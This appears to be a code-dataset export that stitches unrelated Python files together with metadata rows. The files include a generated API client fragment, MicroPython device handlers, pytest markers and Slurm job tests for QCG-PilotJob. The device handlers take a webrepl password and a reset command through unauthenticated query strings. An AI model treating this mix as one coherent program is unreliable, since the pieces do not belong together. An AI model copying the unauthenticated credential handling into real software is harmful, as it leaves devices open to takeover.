                " to method post_spend_tx" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `post_spend_tx`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/spend-tx', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        # `async` became a reserved keyword in Python 3.7, so it cannot be
        # written as a literal keyword argument; forward it via dict
        # unpacking instead — the runtime call is unchanged.
        **{'async': params.get('async')})
| 40.385623
| 182
| 0.612387
| 14,836
| 126,407
| 4.955109
| 0.016918
| 0.053214
| 0.023615
| 0.030362
| 0.984765
| 0.980113
| 0.976045
| 0.972318
| 0.968605
| 0.964469
| 0
| 0.017611
| 0.299683
| 126,407
| 3,129
| 183
| 40.39853
| 0.812821
| 0.053992
| 0
| 0.826573
| 0
| 0.006467
| 0.192979
| 0.05098
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.002352
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
96e7405ebb101f58fb181b2783798e19f30effd3
| 476
|
py
|
Python
|
modelchimp/models/__init__.py
|
samzer/modelchimp-server
|
48668d0f73025b2cc967006b3193b67aaf970ad7
|
[
"BSD-2-Clause"
] | 134
|
2018-11-07T08:35:47.000Z
|
2022-01-09T00:39:40.000Z
|
modelchimp/models/__init__.py
|
samzer/modelchimp-server
|
48668d0f73025b2cc967006b3193b67aaf970ad7
|
[
"BSD-2-Clause"
] | 841
|
2018-11-06T19:45:04.000Z
|
2022-03-31T13:07:16.000Z
|
modelchimp/models/__init__.py
|
samzer/modelchimp-server
|
48668d0f73025b2cc967006b3193b67aaf970ad7
|
[
"BSD-2-Clause"
] | 16
|
2019-02-08T12:48:17.000Z
|
2021-02-18T22:11:38.000Z
|
from modelchimp.models.project import Project
from modelchimp.models.membership import Membership
from modelchimp.models.experiment import Experiment
from modelchimp.models.comment import Comment
from modelchimp.models.profile import Profile
from modelchimp.models.user import User
from modelchimp.models.invitation import Invitation
from modelchimp.models.experiment_image import ExperimentImage
from modelchimp.models.experiment_custom_object import ExperimentCustomObject
| 47.6
| 77
| 0.884454
| 57
| 476
| 7.333333
| 0.280702
| 0.301435
| 0.430622
| 0.215311
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077731
| 476
| 9
| 78
| 52.888889
| 0.952164
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
96ee6897adb018bcdb2ab8a290bbd4a2d96dab86
| 1,608
|
py
|
Python
|
Tests/json_tests.py
|
Jakar510/PythonExtensions
|
f29600f73454d21345f6da893a1df1b71ddacd0b
|
[
"MIT"
] | null | null | null |
Tests/json_tests.py
|
Jakar510/PythonExtensions
|
f29600f73454d21345f6da893a1df1b71ddacd0b
|
[
"MIT"
] | null | null | null |
Tests/json_tests.py
|
Jakar510/PythonExtensions
|
f29600f73454d21345f6da893a1df1b71ddacd0b
|
[
"MIT"
] | null | null | null |
from PythonExtensions.Json import *
from PythonExtensions.debug import *

# Manual smoke test for PlacePosition.Update with KeepInView=True: sweep a
# range of offsets around the image/view boundaries and pretty-print the
# clamped position after each move for visual inspection.
pos = PlacePosition.Zero()
i = Size.Create(1200, 1050)   # image size
v = Size.Create(1280, 800)    # view size
p = PlacePosition.Zero()

# Every probe uses the same value for x and y: far past the negative edge,
# through the -199..-201 boundary, back to zero, then out positive.
for offset in (-50, -100, -150, -199, -200, -201, -250, -500, -1000,
               0, 50, 100, 250, 500, 1000):
    print()
    p.Set(offset, offset)
    PrettyPrint(pos=pos.Update(p, i, v, KeepInView=True), i=i, v=v, p=p)
| 22.647887
| 68
| 0.651119
| 324
| 1,608
| 3.231481
| 0.101852
| 0.057307
| 0.12894
| 0.329513
| 0.845272
| 0.845272
| 0.845272
| 0.845272
| 0.845272
| 0.845272
| 0
| 0.071277
| 0.118781
| 1,608
| 70
| 69
| 22.971429
| 0.667608
| 0
| 0
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.039216
| 0
| 0.039216
| 0.294118
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8c04c79de35188e06fd0f365a5afa8aff24e8419
| 4,053
|
py
|
Python
|
src/interface/device.py
|
Abhi-1U/REST.8266
|
2ee0e9ed3baf68eaceed69f902d1cce6f84881f3
|
[
"MIT"
] | 1
|
2021-04-19T02:24:54.000Z
|
2021-04-19T02:24:54.000Z
|
src/interface/device.py
|
Abhi-1U/REST.8266
|
2ee0e9ed3baf68eaceed69f902d1cce6f84881f3
|
[
"MIT"
] | null | null | null |
src/interface/device.py
|
Abhi-1U/REST.8266
|
2ee0e9ed3baf68eaceed69f902d1cce6f84881f3
|
[
"MIT"
] | null | null | null |
from userver.server import jsonify,parse_qs,start_response
def software(request , response):
    """Handle the /software route: GET returns software details as JSON,
    every other verb returns the ERR_ME_1 error payload."""
    if request.method == 'GET':
        # Import deferred into the branch, presumably to keep boot-time
        # memory low on the microcontroller.
        from controller.device import software_details
        payload = software_details()
    else:
        from controller.error import raise_error
        payload = raise_error('ERR_ME_1')
    yield from jsonify(response, payload)
def hardware(request , response):
    """Handle the /hardware route: GET returns hardware details as JSON,
    every other verb returns the ERR_ME_1 error payload."""
    if request.method == 'GET':
        # Lazy import keeps the module cheap to load on constrained devices.
        from controller.device import hardware_details
        payload = hardware_details()
    else:
        from controller.error import raise_error
        payload = raise_error('ERR_ME_1')
    yield from jsonify(response, payload)
def uid(request , response):
    """Handle the /uid route: GET returns the device unique id as JSON,
    every other verb returns the ERR_ME_1 error payload."""
    if request.method == 'GET':
        # Lazy import keeps the module cheap to load on constrained devices.
        from controller.device import unique_id
        payload = unique_id()
    else:
        from controller.error import raise_error
        payload = raise_error('ERR_ME_1')
    yield from jsonify(response, payload)
def reset_dev(request , response):
    # Reset the device. The 'reset' flag arrives via the query string (GET)
    # or form data (POST/PATCH/PUT); only the literal string 'True' triggers
    # the reset. NOTE(review): when the flag is absent or not 'True' the
    # handler yields nothing, i.e. the client gets an empty response —
    # confirm callers handle that.
    if(request.method=='GET'):
        qs=parse_qs(request.qs)
        # deferred import — presumably to keep idle memory low on MicroPython
        from controller.device import reset
        rset=''
        if 'reset' in qs:
            # NOTE(review): some parse_qs implementations return list values;
            # verify this yields a plain string so the 'True' compare works.
            rset=(qs['reset'])
        if rset=='True':
            yield from reset(response)
    elif(request.method=='POST'or request.method=='PATCH'):
        # Body must be read before request.form is available.
        yield from request.read_form_data()
        from controller.device import reset
        rset=''
        if 'reset' in request.form:
            rset=(request.form['reset'])
        if rset=='True':
            yield from reset(response)
    elif(request.method=='PUT'):
        # PUT mirrors the POST/PATCH path (same form-data protocol).
        yield from request.read_form_data()
        rset=''
        from controller.device import reset
        if 'reset' in request.form:
            rset=(request.form['reset'])
        if rset=='True':
            yield from reset(response)
    else:
        # Unsupported verb -> method-error payload.
        from controller.error import raise_error
        yield from jsonify(response, raise_error('ERR_ME_1'))
def webrepl_mode(request , response):
    # Toggle webrepl. Activated only when the 'repl' parameter equals the
    # literal string 'True'; the parameter source depends on the HTTP verb
    # (query string for GET, form data otherwise). NOTE(review): when the
    # flag is absent/false the handler yields nothing (empty response).
    if(request.method=='GET'):
        qs=parse_qs(request.qs)
        # deferred import — presumably to keep idle memory low on MicroPython
        from controller.device import webrepl
        rt=''
        if 'repl' in qs:
            rt=(qs['repl'])
        if rt=='True':
            yield from jsonify(response,webrepl(response))
    elif(request.method=='POST'or request.method=='PATCH'):
        # Body must be read before request.form is available.
        yield from request.read_form_data()
        from controller.device import webrepl
        rt=''
        if 'repl' in request.form:
            rt=(request.form['repl'])
        if rt=='True':
            yield from jsonify(response,webrepl(response))
    elif(request.method=='PUT'):
        yield from request.read_form_data()
        rt=''
        from controller.device import webrepl
        if 'repl' in request.form:
            rt=(request.form['repl'])
        # PUT replies with a bare status line rather than a JSON body —
        # NOTE(review): inconsistent with GET/POST; confirm intended.
        if rt=='True':
            webrepl(response)
            yield from start_response(response)
    else:
        from controller.error import raise_error
        yield from jsonify(response, raise_error('ERR_ME_1'))
def wc(request , response):
    # Configure webrepl credentials. The password arrives under the
    # 'password' key in the query string (GET) or form data (POST/PATCH/PUT)
    # and is forwarded to webrepl_configs.
    if(request.method=='GET'):
        qs=parse_qs(request.qs)
        # deferred import — presumably to keep idle memory low on MicroPython
        from controller.device import webrepl_configs
        rt=''
        if 'password' in qs:
            rt=(qs['password'])
        yield from jsonify(response,webrepl_configs(rt,response))
    elif(request.method=='POST'or request.method=='PATCH'):
        # Body must be read before request.form is available.
        yield from request.read_form_data()
        from controller.device import webrepl_configs
        rt=''
        if 'password' in request.form:
            rt=(request.form['password'])
        yield from jsonify(response,webrepl_configs(rt,response))
    elif(request.method=='PUT'):
        yield from request.read_form_data()
        rt=''
        from controller.device import webrepl_configs
        if 'password' in request.form:
            rt=(request.form['password'])
        # NOTE(review): unlike GET/POST, PUT only applies the config when the
        # *password* is literally 'True' — this looks copy/pasted from
        # webrepl_mode's flag check; confirm the intended behaviour.
        if rt=='True':
            webrepl_configs(rt,response)
            yield from start_response(response)
    else:
        from controller.error import raise_error
        yield from jsonify(response, raise_error('ERR_ME_1'))
| 34.939655
| 65
| 0.619541
| 487
| 4,053
| 5.039014
| 0.100616
| 0.08802
| 0.08476
| 0.127139
| 0.91035
| 0.872453
| 0.869601
| 0.869601
| 0.869601
| 0.825998
| 0
| 0.002026
| 0.26943
| 4,053
| 115
| 66
| 35.243478
| 0.826748
| 0
| 0
| 0.801887
| 0
| 0
| 0.05727
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056604
| false
| 0.056604
| 0.179245
| 0
| 0.235849
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
8c04ccd10af2afec087d7c12c33e7d9db916f468
| 166
|
py
|
Python
|
tests/markers.py
|
vyahello/newspaper-parser
|
ad986dfc43e089f376ffe96251cf6481df133329
|
[
"MIT"
] | null | null | null |
tests/markers.py
|
vyahello/newspaper-parser
|
ad986dfc43e089f376ffe96251cf6481df133329
|
[
"MIT"
] | 3
|
2020-08-20T10:19:16.000Z
|
2022-01-28T10:38:22.000Z
|
tests/markers.py
|
vyahello/newspaper-parser
|
ad986dfc43e089f376ffe96251cf6481df133329
|
[
"MIT"
] | null | null | null |
# flake8: noqa
import _pytest.mark
import pytest

# Reusable pytest markers: tests decorate themselves with @unit /
# @functional so subsets can be selected via `pytest -m unit` or
# `pytest -m functional`. The explicit MarkDecorator annotations give
# type checkers something concrete for the dynamically-created marks.
unit: _pytest.mark.MarkDecorator = pytest.mark.unit
functional: _pytest.mark.MarkDecorator = pytest.mark.functional
| 23.714286
| 63
| 0.813253
| 21
| 166
| 6.285714
| 0.380952
| 0.378788
| 0.348485
| 0.439394
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006667
| 0.096386
| 166
| 6
| 64
| 27.666667
| 0.873333
| 0.072289
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
8c61d6d467731d6a9df40ca3901d4f3a43055617
| 73
|
py
|
Python
|
backend/products/tests/test_data/__init__.py
|
MaCkRage/optimize_sql
|
346011fbda5ddf96a3c34357820452e165b7767c
|
[
"MIT"
] | null | null | null |
backend/products/tests/test_data/__init__.py
|
MaCkRage/optimize_sql
|
346011fbda5ddf96a3c34357820452e165b7767c
|
[
"MIT"
] | null | null | null |
backend/products/tests/test_data/__init__.py
|
MaCkRage/optimize_sql
|
346011fbda5ddf96a3c34357820452e165b7767c
|
[
"MIT"
] | null | null | null |
from .generate_update_products_data import generate_update_products_data
| 36.5
| 72
| 0.931507
| 10
| 73
| 6.2
| 0.6
| 0.451613
| 0.709677
| 0.83871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054795
| 73
| 1
| 73
| 73
| 0.898551
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
4fb46eafd9771b113e834508594c7169ed1d6a2e
| 22,079
|
py
|
Python
|
components/core/qcg/pilotjob/tests/test_slurmenv.py
|
LourensVeen/QCG-PilotJob
|
e78c35a9b16b1042a2d5b54352a2ca2e3a58c6b9
|
[
"Apache-2.0"
] | null | null | null |
components/core/qcg/pilotjob/tests/test_slurmenv.py
|
LourensVeen/QCG-PilotJob
|
e78c35a9b16b1042a2d5b54352a2ca2e3a58c6b9
|
[
"Apache-2.0"
] | null | null | null |
components/core/qcg/pilotjob/tests/test_slurmenv.py
|
LourensVeen/QCG-PilotJob
|
e78c35a9b16b1042a2d5b54352a2ca2e3a58c6b9
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from os import environ, mkdir, stat
from os.path import dirname, join, isdir, exists, abspath
import tempfile
import logging
import asyncio
import time
from shutil import rmtree
import sys
from qcg.pilotjob.service import QCGPMService
from qcg.pilotjob.slurmres import in_slurm_allocation, get_num_slurm_nodes
from qcg.pilotjob.executionjob import LauncherExecutionJob
from qcg.pilotjob.joblist import Job, JobExecution, JobResources, ResourceSize, JobDependencies
from qcg.pilotjob.tests.utils import save_reqs_to_file, check_job_status_in_json, get_slurm_resources, \
get_slurm_resources_binded, set_pythonpath_to_qcg_module
from qcg.pilotjob.tests.utils import SHARED_PATH
def test_slurmenv_simple_resources():
    """Smoke test: Slurm resource discovery succeeds in a >=2-node allocation."""
    inside_allocation = in_slurm_allocation()
    if not inside_allocation or get_num_slurm_nodes() < 2:
        pytest.skip('test not run in slurm allocation or allocation is smaller than 2 nodes')
    get_slurm_resources()
def test_slurmenv_simple_resources_binding():
    """Dump the CPU-binding environment and verify bound-resource discovery."""
    inside_allocation = in_slurm_allocation()
    if not inside_allocation or get_num_slurm_nodes() < 2:
        pytest.skip('test not run in slurm allocation or allocation is smaller than 2 nodes')

    # Print the Slurm/CUDA binding environment for post-mortem debugging;
    # order matches the original output exactly.
    for var_name in ('SLURM_NODELIST',
                     'SLURM_JOB_CPUS_PER_NODE',
                     'SLURM_CPU_BIND_LIST',
                     'SLURM_CPU_BIND_TYPE',
                     'CUDA_VISIBLE_DEVICES'):
        print('{}: {}'.format(var_name, environ.get(var_name, None)))

    get_slurm_resources_binded()
#def test_slurmenv_simple_job(caplog):
# caplog.set_level(logging.DEBUG)
def test_slurmenv_simple_job():
    """End-to-end run of a single 'date' job through QCG-PilotJob under Slurm.

    Submits one single-core job, lets the service run to completion, then
    checks the sandbox output files and that the job's allocation only used
    nodes belonging to this Slurm allocation.
    """
    if not in_slurm_allocation() or get_num_slurm_nodes() < 2:
        pytest.skip('test not run in slurm allocation or allocation is smaller than 2 nodes')

    resources, allocation = get_slurm_resources_binded()
    resources_node_names = set(n.name for n in resources.nodes)

    set_pythonpath_to_qcg_module()
    # Work dir must live on a filesystem shared by all allocation nodes.
    tmpdir = str(tempfile.mkdtemp(dir=SHARED_PATH))
    file_path = join(tmpdir, 'jobs.json')
    print('tmpdir: {}'.format(tmpdir))

    jobName = 'mdate'
    jobs = [job.to_dict() for job in [
        Job(jobName,
            JobExecution(
                'date',
                wd = abspath(join(tmpdir, 'date.sandbox')),
                stdout = 'date.out',
                stderr = 'date.err'
            ),
            JobResources( numCores=ResourceSize(1) )
        )
    ] ]
    # 'finishAfterAllTasksDone' makes the service exit once the job completes.
    reqs = [ { 'request': 'submit', 'jobs': jobs },
             { 'request': 'control', 'command': 'finishAfterAllTasksDone' } ]
    save_reqs_to_file(reqs, file_path)
    print('jobs saved to file_path: {}'.format(str(file_path)))

    # The service parses its configuration from sys.argv (file mode, json report).
    sys.argv = [ 'QCG-PilotJob', '--log', 'debug', '--file', '--file-path', str(file_path), '--wd', tmpdir,
                 '--report-format', 'json']
    QCGPMService().start()

    jobEntries = check_job_status_in_json([ jobName ], workdir=tmpdir, dest_state='SUCCEED')
    # Sandbox dir and stdout/stderr files must exist; stdout must be non-empty.
    assert all((isdir(abspath(join(tmpdir, 'date.sandbox'))),
                exists(join(abspath(join(tmpdir, 'date.sandbox')), 'date.out')),
                exists(join(abspath(join(tmpdir, 'date.sandbox')), 'date.err')),
                stat(join(abspath(join(tmpdir, 'date.sandbox')), 'date.out')).st_size > 0))
    # there can be some debugging messages in the stderr
    # stat(join(abspath(join(tmpdir, 'date.sandbox')), 'date.err')).st_size == 0))

    for jname, jentry in jobEntries.items():
        assert all(('runtime' in jentry, 'allocation' in jentry.get('runtime', {})))

        # Allocation entries look like 'nodename[core:core:...]' joined by ','.
        jalloc = jentry['runtime']['allocation']
        for jalloc_node in jalloc.split(','):
            node_name = jalloc_node[:jalloc_node.index('[')]
            print('{} in available nodes ({})'.format(node_name, ','.join(resources_node_names)))
            assert node_name in resources_node_names, '{} not in nodes ({}'.format(
                node_name, ','.join(resources_node_names))

    # Querying an unknown job name must raise.
    with pytest.raises(ValueError):
        check_job_status_in_json([jobName + 'xxx'], workdir=tmpdir, dest_state='SUCCEED')

    rmtree(tmpdir)
def test_slurmenv_simple_script():
    """Like test_slurmenv_simple_job but the job is defined as an inline
    shell script instead of an executable name; stderr must stay empty."""
    if not in_slurm_allocation() or get_num_slurm_nodes() < 2:
        pytest.skip('test not run in slurm allocation or allocation is smaller than 2 nodes')

    resources, allocation = get_slurm_resources_binded()
    resources_node_names = set(n.name for n in resources.nodes)

    set_pythonpath_to_qcg_module()
    # Work dir must live on a filesystem shared by all allocation nodes.
    tmpdir = str(tempfile.mkdtemp(dir=SHARED_PATH))
    file_path = join(tmpdir, 'jobs.json')
    print('tmpdir: {}'.format(tmpdir))

    jobName = 'mdate_script'
    jobs = [job.to_dict() for job in [
        Job(jobName,
            JobExecution(
                script = '/bin/date\n/bin/hostname\n',
                wd = abspath(join(tmpdir, 'date.sandbox')),
                stdout = 'date.out',
                stderr = 'date.err'
            ),
            JobResources( numCores=ResourceSize(1) )
        )
    ] ]
    # 'finishAfterAllTasksDone' makes the service exit once the job completes.
    reqs = [ { 'request': 'submit', 'jobs': jobs },
             { 'request': 'control', 'command': 'finishAfterAllTasksDone' } ]
    save_reqs_to_file(reqs, file_path)
    print('jobs saved to file_path: {}'.format(str(file_path)))

    # The service parses its configuration from sys.argv (file mode, json report).
    sys.argv = [ 'QCG-PilotJob', '--log', 'debug', '--file', '--file-path', str(file_path), '--wd', tmpdir,
                 '--report-format', 'json']
    QCGPMService().start()

    jobEntries = check_job_status_in_json([ jobName ], workdir=tmpdir, dest_state='SUCCEED')
    # Script output goes to stdout; a script job is expected to leave stderr empty.
    assert all((isdir(abspath(join(tmpdir, 'date.sandbox'))),
                exists(join(abspath(join(tmpdir, 'date.sandbox')), 'date.out')),
                exists(join(abspath(join(tmpdir, 'date.sandbox')), 'date.err')),
                stat(join(abspath(join(tmpdir, 'date.sandbox')), 'date.out')).st_size > 0,
                stat(join(abspath(join(tmpdir, 'date.sandbox')), 'date.err')).st_size == 0))

    for jname, jentry in jobEntries.items():
        assert all(('runtime' in jentry, 'allocation' in jentry.get('runtime', {})))

        # Allocation entries look like 'nodename[core:core:...]' joined by ','.
        jalloc = jentry['runtime']['allocation']
        for jalloc_node in jalloc.split(','):
            node_name = jalloc_node[:jalloc_node.index('[')]
            print('{} in available nodes ({})'.format(node_name, ','.join(resources_node_names)))
            assert node_name in resources_node_names, '{} not in nodes ({}'.format(
                node_name, ','.join(resources_node_names))

    # Querying an unknown job name must raise.
    with pytest.raises(ValueError):
        check_job_status_in_json([jobName + 'xxx'], workdir=tmpdir, dest_state='SUCCEED')

    rmtree(tmpdir)
def test_slurmenv_many_cores():
    """Run an MPI 'hostname' job on 2 cores and verify the per-core allocation.

    Counts the cores reported in the job's allocation string and checks the
    stdout contains exactly one hostname line per allocated core.
    """
    if not in_slurm_allocation() or get_num_slurm_nodes() < 2:
        pytest.skip('test not run in slurm allocation or allocation is smaller than 2 nodes')

    resources, allocation = get_slurm_resources_binded()
    resources_node_names = set(n.name for n in resources.nodes)

    set_pythonpath_to_qcg_module()
    # Work dir must live on a filesystem shared by all allocation nodes.
    tmpdir = str(tempfile.mkdtemp(dir=SHARED_PATH))
    file_path = join(tmpdir, 'jobs.json')
    print('tmpdir: {}'.format(tmpdir))

    jobName = 'hostname'
    jobwdir_base = 'hostname.sandbox'
    cores_num = 2
    jobs = [job.to_dict() for job in [
        Job(jobName,
            JobExecution(
                exec = 'mpirun',
                args = [ '--allow-run-as-root', 'hostname' ],
                wd = abspath(join(tmpdir, jobwdir_base)),
                stdout = 'hostname.out',
                stderr = 'hostname.err',
                modules = [ 'mpi/openmpi-x86_64' ]
            ),
            JobResources(numCores=ResourceSize(cores_num) )
        )
    ] ]
    # 'finishAfterAllTasksDone' makes the service exit once the job completes.
    reqs = [ { 'request': 'submit', 'jobs': jobs },
             { 'request': 'control', 'command': 'finishAfterAllTasksDone' } ]
    save_reqs_to_file(reqs, file_path)
    print('jobs saved to file_path: {}'.format(str(file_path)))

    # The service parses its configuration from sys.argv (file mode, json report).
    sys.argv = [ 'QCG-PilotJob', '--log', 'debug', '--file', '--file-path', str(file_path), '--wd', tmpdir,
                 '--report-format', 'json']
    QCGPMService().start()

    jobEntries = check_job_status_in_json([ jobName ], workdir=tmpdir, dest_state='SUCCEED')
    assert all((isdir(abspath(join(tmpdir, jobwdir_base))),
                exists(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.out')),
                exists(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.err')),
                stat(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.out')).st_size > 0))

    job_nodes = []
    allocated_cores = 0
    for jname, jentry in jobEntries.items():
        assert all(('runtime' in jentry, 'allocation' in jentry.get('runtime', {})))

        # Allocation entries look like 'nodename[core:core:...]' joined by ','.
        jalloc = jentry['runtime']['allocation']
        for jalloc_node in jalloc.split(','):
            node_name = jalloc_node[:jalloc_node.index('[')]
            job_nodes.append(node_name)
            print('{} in available nodes ({})'.format(node_name, ','.join(resources_node_names)))
            assert node_name in resources_node_names, '{} not in nodes ({}'.format(
                node_name, ','.join(resources_node_names))

            # Cores are the ':'-separated ids inside the brackets.
            ncores = len(jalloc_node[jalloc_node.index('[') + 1:-1].split(':'))
            allocated_cores += ncores
    assert allocated_cores == cores_num, allocated_cores

    # check if hostname is in stdout in two lines
    with open(abspath(join(tmpdir, join(jobwdir_base, 'hostname.out'))), 'rt') as stdout_file:
        stdout_content = [line.rstrip() for line in stdout_file.readlines()]
    assert len(stdout_content) == cores_num, str(stdout_content)
    assert all(hostname in job_nodes for hostname in stdout_content), str(stdout_content)

    # Querying an unknown job name must raise.
    with pytest.raises(ValueError):
        check_job_status_in_json([jobName + 'xxx'], workdir=tmpdir, dest_state='SUCCEED')

    rmtree(tmpdir)
def test_slurmenv_many_nodes():
    """Run an MPI 'hostname' job spanning 2 nodes x 1 core each.

    Verifies the allocation covers exactly nodes_num nodes with
    nodes_num * cores_num total cores, and that stdout has one hostname
    line per allocated core.
    """
    if not in_slurm_allocation() or get_num_slurm_nodes() < 2:
        pytest.skip('test not run in slurm allocation or allocation is smaller than 2 nodes')

    resources, allocation = get_slurm_resources_binded()
    resources_node_names = set(n.name for n in resources.nodes)

    set_pythonpath_to_qcg_module()
    # Work dir must live on a filesystem shared by all allocation nodes.
    tmpdir = str(tempfile.mkdtemp(dir=SHARED_PATH))
    file_path = join(tmpdir, 'jobs.json')
    print('tmpdir: {}'.format(tmpdir))

    jobName = 'hostname'
    jobwdir_base = 'hostname.sandbox'
    cores_num = 1
    nodes_num = 2
    jobs = [job.to_dict() for job in [
        Job(jobName,
            JobExecution(
                exec = 'mpirun',
                args = [ '--allow-run-as-root', 'hostname' ],
                wd = abspath(join(tmpdir, jobwdir_base)),
                stdout = 'hostname.out',
                stderr = 'hostname.err',
                modules = [ 'mpi/openmpi-x86_64' ]
            ),
            JobResources(numCores=ResourceSize(cores_num), numNodes=ResourceSize(nodes_num))
        )
    ] ]
    # 'finishAfterAllTasksDone' makes the service exit once the job completes.
    reqs = [ { 'request': 'submit', 'jobs': jobs },
             { 'request': 'control', 'command': 'finishAfterAllTasksDone' } ]
    save_reqs_to_file(reqs, file_path)
    print('jobs saved to file_path: {}'.format(str(file_path)))

    # The service parses its configuration from sys.argv (file mode, json report).
    sys.argv = [ 'QCG-PilotJob', '--log', 'debug', '--file', '--file-path', str(file_path), '--wd', tmpdir,
                 '--report-format', 'json']
    QCGPMService().start()

    jobEntries = check_job_status_in_json([ jobName ], workdir=tmpdir, dest_state='SUCCEED')
    assert all((isdir(abspath(join(tmpdir, jobwdir_base))),
                exists(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.out')),
                exists(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.err')),
                stat(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.out')).st_size > 0))

    job_nodes = []
    allocated_cores = 0
    for jname, jentry in jobEntries.items():
        assert all(('runtime' in jentry, 'allocation' in jentry.get('runtime', {})))

        # Allocation entries look like 'nodename[core:core:...]' joined by ','.
        jalloc = jentry['runtime']['allocation']
        for jalloc_node in jalloc.split(','):
            node_name = jalloc_node[:jalloc_node.index('[')]
            job_nodes.append(node_name)
            print('{} in available nodes ({})'.format(node_name, ','.join(resources_node_names)))
            assert node_name in resources_node_names, '{} not in nodes ({}'.format(
                node_name, ','.join(resources_node_names))

            # Cores are the ':'-separated ids inside the brackets.
            ncores = len(jalloc_node[jalloc_node.index('[') + 1:-1].split(':'))
            allocated_cores += ncores
    assert len(job_nodes) == nodes_num, str(job_nodes)
    assert allocated_cores == nodes_num * cores_num, allocated_cores

    # check if hostname is in stdout in two lines
    with open(abspath(join(tmpdir, join(jobwdir_base, 'hostname.out'))), 'rt') as stdout_file:
        stdout_content = [line.rstrip() for line in stdout_file.readlines()]
    assert len(stdout_content) == nodes_num * cores_num, str(stdout_content)
    assert all(hostname in job_nodes for hostname in stdout_content), str(stdout_content)

    # Querying an unknown job name must raise.
    with pytest.raises(ValueError):
        check_job_status_in_json([jobName + 'xxx'], workdir=tmpdir, dest_state='SUCCEED')

    rmtree(tmpdir)
def test_slurmenv_many_nodes_no_cores():
    """Run an MPI 'hostname' job that requests only a node count (no core count).

    With numNodes but no numCores the scheduler is expected to hand out more
    than one core per node, hence the '>' assertion on allocated_cores.
    """
    if not in_slurm_allocation() or get_num_slurm_nodes() < 2:
        pytest.skip('test not run in slurm allocation or allocation is smaller than 2 nodes')

    resources, allocation = get_slurm_resources_binded()
    resources_node_names = set(n.name for n in resources.nodes)

    set_pythonpath_to_qcg_module()
    # Work dir must live on a filesystem shared by all allocation nodes.
    tmpdir = str(tempfile.mkdtemp(dir=SHARED_PATH))
    file_path = join(tmpdir, 'jobs.json')
    print('tmpdir: {}'.format(tmpdir))

    jobName = 'hostname'
    jobwdir_base = 'hostname.sandbox'
    nodes_num = 2
    jobs = [job.to_dict() for job in [
        Job(jobName,
            JobExecution(
                exec = 'mpirun',
                args = [ '--allow-run-as-root', 'hostname' ],
                wd = abspath(join(tmpdir, jobwdir_base)),
